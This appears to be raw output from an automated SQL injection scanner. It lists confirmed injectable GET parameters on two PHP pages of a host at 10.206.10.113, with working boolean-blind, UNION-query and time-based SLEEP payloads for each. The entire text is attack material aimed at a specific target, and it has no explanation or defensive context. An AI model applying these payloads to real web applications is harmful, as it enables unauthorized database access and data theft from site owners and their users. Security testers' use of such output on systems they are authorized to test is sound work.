http://10.206.10.113/new.php?id=2
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2 AND 9936=9936

    Type: UNION query
    Title: MySQL UNION query (NULL) - 6 columns
    Payload: id=-9069 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7177776271,0x794b6a6b687448704573,0x7179676c71),NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=2 AND SLEEP(5)
---

http://10.206.10.113/jobs.php?j_id=1
---
Place: GET
Parameter: j_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: j_id=1 AND 5743=5743

    Type: UNION query
    Title: MySQL UNION query (NULL) - 9 columns
    Payload: j_id=-8970 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7178797871,0x75414859587054564f4f,0x7169716c71),NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: j_id=1 AND SLEEP(5)
---

